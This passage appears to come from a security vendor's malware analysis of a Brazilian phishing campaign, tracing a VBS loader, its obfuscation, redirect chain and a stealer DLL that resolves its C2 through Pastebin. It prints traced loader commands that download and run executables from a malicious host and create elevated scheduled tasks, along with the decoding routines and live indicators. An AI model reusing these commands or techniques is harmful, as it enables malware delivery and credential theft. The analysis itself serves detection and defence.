                    style=" width:13.623978201635%;                    padding:10px;
                    "
                    >
                                        Phase                     </th>
                                                <th class="wpdt-cell wpdt-bc-03A9F4 wpdt-bold wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:86.376021798365%;                    padding:10px;
                    "
                    >
                                        Description                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-bold wpdt-bc-FFFFFF"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Delivery                     </td>
                                                <td class="wpdt-cell wpdt-fs-000013 wpdt-align-left"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Phishing email with judicial lure. Password-protected PDF attachment. Victim instructed to download VBS via embedded link.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-bold"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Initial Execution                     </td>
                                                <td class="wpdt-cell wpdt-fs-000013 wpdt-align-left"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Victim manually executes 0124_INTMACAO_.vbs from Downloads folder. WScript.exe invoked.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-bold"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Gate Contact                     </td>
                                                <td class="wpdt-cell wpdt-fs-000013 wpdt-align-left"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        VBS contacts odaracani.online/index.php?id=3df947b3 (unique victim ID). GET returns 200; POST triggers 302 redirect.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-bold"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Payload Landing                     </td>
                                                <td class="wpdt-cell wpdt-fs-000013 wpdt-align-left"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Redirected to nuevaprodeciencia.club/br77b/ redirect chain via cert.php → cord.php → download.php → arquivos/download.php?id_*.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-bold"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Payload Download                     </td>
                                                <td class="wpdt-cell wpdt-fs-000013 wpdt-align-left"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        VBS uses MSXML2.ServerXMLHTTP.6.0 + ADODB.Stream to download reiniciar.exe (~6.4 MB) and wifi_driver.exe (~12.6 MB, served as msedge04.exe).                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-bold"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Installation                     </td>
                                                <td class="wpdt-cell wpdt-fs-000013 wpdt-align-left"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Payloads written to C:\Program Files (x86)\Wi-fi\ masquerading as Wi-Fi driver components.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-bold"
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Persistence                     </td>
                                                <td class="wpdt-cell wpdt-fs-000013 wpdt-align-left"
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Two Scheduled Tasks created via cmd.exe: RunAsAdmin_AutoUpdate and RunAsAdmin_Executar both /sc onlogon /rl highest.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-bold"
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        UAC Bypass                     </td>
                                                <td class="wpdt-cell wpdt-fs-000013 wpdt-align-left"
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        VBS re-executes with arguments /elevated /fromtask to gain elevated privileges without a UAC prompt.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-bold"
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Initial Beacon                     </td>
                                                <td class="wpdt-cell wpdt-fs-000013 wpdt-align-left"
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        VBS calls IWshShell3.Run() on nuevaprodeciencia.club/br77b/iayjaskyeiagds.php first checkin triggered directly from loader.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-bold"
                                            data-cell-id="A11"
                    data-col-index="0"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        C2 Resolution                     </td>
                                                <td class="wpdt-cell wpdt-fs-000013 wpdt-align-left"
                                            data-cell-id="B11"
                    data-col-index="1"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        wifi_driver.exe (container) loads agenteV2_historico_detect.dll, which reads Pastebin dead-drop (pastebin.com/raw/0RmxqY57) to resolve real C2: 38.242.246.176:8443.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left wpdt-bold"
                                            data-cell-id="A12"
                    data-col-index="0"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        C2 Beaconing                     </td>
                                                <td class="wpdt-cell wpdt-fs-000013 wpdt-align-left"
                                            data-cell-id="B12"
                    data-col-index="1"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        agenteV2 beacons to C2 every ~60 seconds over TLS/8443. 524 bytes sent / ~1 KB received per cycle. Stealer module active.                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-293'>
table#wpdtSimpleTable-293{ table-layout: fixed !important; }
table#wpdtSimpleTable-293 td, table.wpdtSimpleTable293 th { white-space: normal !important; }
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
.wpdt-bc-FFFFFF { background-color: #FFFFFF !important;}
.wpdt-fs-000013 { font-size: 13px !important;}
</style>




<h3 class="wp-block-heading">3. Stage 1 VBScript Loader (0124_INTMACAO_.vbs)&nbsp;</h3>



<h4 class="wp-block-heading"><em>3.1. Runtime Behavior (API Trace)</em>&nbsp;</h4>



<p>The following sequence was reconstructed from the ANY.RUN script API trace, showing the exact execution order of COM object calls:&nbsp;</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="763" height="789" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_3.png" alt="" class="wp-image-20386" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_3.png 763w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_3-290x300.png 290w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_3-370x383.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_3-270x279.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_3-740x765.png 740w" sizes="(max-width: 763px) 100vw, 763px" /><figcaption class="wp-element-caption"><em>ANY.RUN VBScript API call trace</em></figcaption></figure>



<p><strong>Phase 1 reiniciar.exe download and persistence (~13 seconds post-execution):</strong>&nbsp;</p>



<pre class="wp-block-code"><code>IServerXMLHTTPRequest2.Open('GET', 'https://nuevaprodeciencia.club/br77b/arquivos/download/reiniciar.exe', False) 

IServerXMLHTTPRequest2.Send()                      -&gt; HTTP 200 OK 

ADODB.Stream.Type = 1 (binary) 

ADODB.Stream.Write(ResponseBody)                   -&gt; VT_ARRAY 

ADODB.Stream.SaveToFile('C:\Program Files (x86)\Wi-fi\reiniciar.exe', 2) 

IWshShell3.Run('cmd.exe /c schtasks /create /f /tn "RunAsAdmin_Executar" ...reiniciar.exe... /sc onlogon /rl highest', 0, False)</code></pre>



<p><strong>Phase 2 wifi_driver.exe download, persistence and initial beacon (~22–29 seconds):</strong>&nbsp;</p>



<pre class="wp-block-code"><code>IServerXMLHTTPRequest2.Open('GET', 'https://nuevaprodeciencia.club/br77b/arquivos/download/msedge04.exe', False) 

IServerXMLHTTPRequest2.Send()                      -&gt; HTTP 200 OK 

ADODB.Stream.SaveToFile('C:\Program Files (x86)\Wi-fi\wifi_driver.exe', 2) 

IWshShell3.Run('"C:\Program Files (x86)\Wi-fi\wifi_driver.exe"', 1, False)  // executed twice 

WScript.Sleep(3000) 

IWshShell3.Run('cmd.exe /c schtasks /create /f /tn "RunAsAdmin_AutoUpdate" ...wifi_driver.exe... /sc onlogon /rl highest', 0, False) 

IWshShell3.Run('https://nuevaprodeciencia.club/br77b/iayjaskyeiagds.php', 1, False)  // initial C2 beacon </code></pre>



<p><strong>Key observations:</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>wifi_driver.exe is executed twice before&nbsp;Sleep(3000) retry mechanism to ensure process&nbsp;startup;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>The server-side filename is msedge04.exe; it is saved locally as wifi_driver.exe deliberate renaming at download&nbsp;time;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>The&nbsp;initial&nbsp;C2 beacon is fired by the VBS&nbsp;loader itself&nbsp;via IWshShell3.Run, before&nbsp;the payload&#8217;s own beaconing loop begins.&nbsp;</li>
</ul>



<h4 class="wp-block-heading"><em>3.2. Obfuscation &amp; Payload Decoding Mechanism&nbsp;</em></h4>



<p>The VBS loader implements a multi-layer obfuscation pipeline that decodes and executes a secondary payload entirely in memory. Despite its&nbsp;apparent&nbsp;complexity, the mechanism is fully deterministic and reversible — all decoding logic, keys, and transformations are self-contained in the script, with no external dependencies or dynamic key generation.&nbsp;</p>



<p>The two on-disk forms confirm runtime&nbsp;deobfuscation:&nbsp;</p>



<pre class="wp-block-code"><code>C:\Users\admin\Downloads\0124_INTMACAO_.vbs          (16,739 bytes  — obfuscated, as delivered) 

C:\Users\admin\AppData\Local\Temp\0124_INTMACAO_.vbs (140,302 bytes — fully decoded runtime copy) </code></pre>



<p>The ~8.4x expansion factor is explained by the encoding pipeline described below.&nbsp;</p>



<p>The encoded payload is stored as a large string built via repeated concatenation:&nbsp;</p>



<pre class="wp-block-code"><code>tEXXKcvxSM = tEXXKcvxSM &amp; "&lt;chunk&gt;" </code></pre>



<p>This pattern avoids signature-based detection of long static strings, prevents straightforward extraction, and obscures the actual payload size. It is a common technique in commodity VBS loaders.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="533" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_4-1024x533.png" alt="" class="wp-image-20405" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_4-1024x533.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_4-300x156.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_4-768x400.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_4-370x193.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_4-270x140.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_4-740x385.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_4.png 1326w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Encoded VBScript Snippet</em></figcaption></figure>



<p>Three transformation functions are applied in sequence before the payload is executed:&nbsp;</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-294"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="4"
           data-wpID="294"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:14.833501513623%;                    padding:10px;
                    "
                    >
                                        Function                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:56.004036326942%;                    padding:10px;
                    "
                    >
                                        Technique                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:29.162462159435%;                    padding:10px;
                    "
                    >
                                        Security Value                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        AqBVqmjYfY (x3)                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Triple Base64 decode via MSXML2.DOMDocument (bin.base64)                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Low — trivially reversible                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        YnrbBGjUXH                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Hexadecimal decode — Chr(CInt("&H" & Mid(h, i, 2)))                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Low — simple hex-to-bytes                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        obmFYHGTeJ                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Custom byte transform — Vigenere-like modular subtraction with hardcoded key array                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Low-Medium — broken by embedded keys                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-294'>
table#wpdtSimpleTable-294{ table-layout: fixed !important; }
table#wpdtSimpleTable-294 td, table.wpdtSimpleTable294 th { white-space: normal !important; }
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<p><strong>Step 1 — Triple Base64 Decoding.</strong>&nbsp;The function&nbsp;AqBVqmjYfY&nbsp;wraps the MSXML2.DOMDocument COM object to perform Base64 decoding. It is called three consecutive times, nesting the calls:</p>



<pre class="wp-block-code"><code>b = AqBVqmjYfY(AqBVqmjYfY(AqBVqmjYfY(b)))</code></pre>



<p>Triple-encoding increases entropy and defeats naive single-pass&nbsp;decoders, but&nbsp;provides no cryptographic security — each layer is independently and trivially reversible.&nbsp;</p>



<p><strong>Step 2 — Hexadecimal Decoding.&nbsp;</strong>The function&nbsp;YnrbBGjUXH&nbsp;converts the Base64-decoded output from a hex-encoded byte stream into raw bytes:&nbsp;</p>



<pre class="wp-block-code"><code>Chr(CInt("&amp;H" &amp; Mid(h, i, 2))) </code></pre>



<p>This&nbsp;confirms&nbsp;the intermediate payload is stored as a hex string, adding one further layer of visual obfuscation over the Base64 output.&nbsp;</p>



<p><strong>Step 3 — Custom Byte Transformation (Pseudo-Encryption).&nbsp;</strong>The function&nbsp;obmFYHGTeJ&nbsp;is the core obfuscation layer. It applies a&nbsp;Vigenere-like modular subtraction cipher using a hardcoded array of multiple keys:&nbsp;</p>



<pre class="wp-block-code"><code>keys = Array("xsTqWN3wxwsA", "Bydpez94dTlZ", ...) </code></pre>



<p>For each byte, the routine iterates through all keys in reverse order and applies:&nbsp;</p>



<pre class="wp-block-code"><code>ch = (ch - keyByte + 256) Mod 256 </code></pre>



<p>This is similar to a repeated-key XOR/Vigenere&nbsp;cipher. It is not cryptographically secure — the keys are hardcoded in the&nbsp;script,&nbsp;the transformation is deterministic, and the decoding pipeline is fully reproducible offline. The critical weakness is that all key material is embedded in the script itself.&nbsp;</p>



<p>After the three-stage decoding, the final payload is executed directly in memory without&nbsp;writing any intermediate artifact to disk:&nbsp;</p>



<pre class="wp-block-code"><code>Execute obmFYHGTeJ(tEXXKcvxSM)</code></pre>



<p>This fileless execution pattern means the next stage never touches the filesystem in decoded form, evading file-based AV scanning. The decoded payload can be recovered by inserting a logging hook at the Execute call or by running the decoding pipeline offline with the extracted keys.&nbsp;</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-295"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="7"
           data-wpID="295"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:16.28664495114%;                    padding:10px;
                    "
                    >
                                        Obfuscation Technique                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:16.28664495114%;                    padding:10px;
                    "
                    >
                                        Effectiveness                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:67.42671009772%;                    padding:10px;
                    "
                    >
                                        Notes                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Triple Base64                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Low                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Three independent reversible layers — no key material required                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Hex encoding                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Low                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Simple Chr/Mid conversion — standard textbook technique                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Custom byte transform                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Low-Medium                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Vigenere-like cipher with good structural complexity                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Hardcoded key array                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Critical weakness                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        All keys embedded in script — full offline decryption possible                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        String concatenation                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Low                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Defeats naive string grep but not dynamic analysis                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        In-memory execution                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Medium                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Evades file-based AV; recoverable via memory dump or hook                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-295'>
table#wpdtSimpleTable-295{ table-layout: fixed !important; }
table#wpdtSimpleTable-295 td, table.wpdtSimpleTable295 th { white-space: normal !important; }
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<p>Overall assessment: the obfuscation chain is consistent with the use of publicly available VBS templates or tutorials. The layered approach&nbsp;demonstrates&nbsp;awareness of basic detection mechanisms but no understanding of cryptographic security. The presence of hardcoded keys and deterministic transformations makes full offline payload recovery straightforward for any analyst with access to the script.&nbsp;</p>



<h4 class="wp-block-heading">4. Stage 2 Payload Architecture&nbsp;</h4>



<p>The payload follows a two-component architecture: a lightweight container executable (wifi_driver.exe) and the actual malicious module (agenteV2_historico_detect.dll). These roles must not be confused&nbsp;only&nbsp;the DLL&nbsp;contains&nbsp;malicious logic.&nbsp;</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-296"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="4"
           data-rows="3"
           data-wpID="296"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:13.667425968109%;                    padding:10px;
                    "
                    >
                                        Component                     </th>
                                                <th class="wpdt-cell wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:11.389521640091%;                    padding:10px;
                    "
                    >
                                        File                     </th>
                                                <th class="wpdt-cell wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:11.389521640091%;                    padding:10px;
                    "
                    >
                                        Size                     </th>
                                                <th class="wpdt-cell wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="D1"
                    data-col-index="3"
                    data-row-index="0"
                    style=" width:63.553530751708%;                    padding:10px;
                    "
                    >
                                        Role                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Container / Bootloader                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        wifi_driver.exe                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        ~12.6 MB                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="D2"
                    data-col-index="3"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Onefile bundle extracts Python runtime + DLL, then loads and executes the stealer DLL                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Core Stealer Module                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        agenteV2_historico_detect.dll                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        ~27 MB                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="D3"
                    data-col-index="3"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        All malicious logic: C2 resolution, browser credential theft, screen capture, persistence                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-296'>
table#wpdtSimpleTable-296{ table-layout: fixed !important; }
table#wpdtSimpleTable-296 td, table.wpdtSimpleTable296 th { white-space: normal !important; }
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<p><strong>wifi_driver.exe Container/Bootloader</strong>&nbsp;</p>



<p>wifi_driver.exe is a self-contained&nbsp;onefile&nbsp;bundle (PyInstaller&nbsp;or&nbsp;Nuitka&nbsp;container mode). It&nbsp;contains&nbsp;no malicious logic of its own. Its sole purpose is to:&nbsp;</p>



<ul class="wp-block-list">
<li>Extract the full Python 3.13 runtime environment to a temporary directory (Temp\onefile_&lt;PID&gt;_&lt;timestamp&gt;\);&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Extract all required .pyd&nbsp;extensions and native DLLs alongside the&nbsp;runtime;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Load and execute agenteV2_historico_detect.dll the actual&nbsp;payload;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Clean up the extraction directory on exit.&nbsp;&nbsp;</li>
</ul>



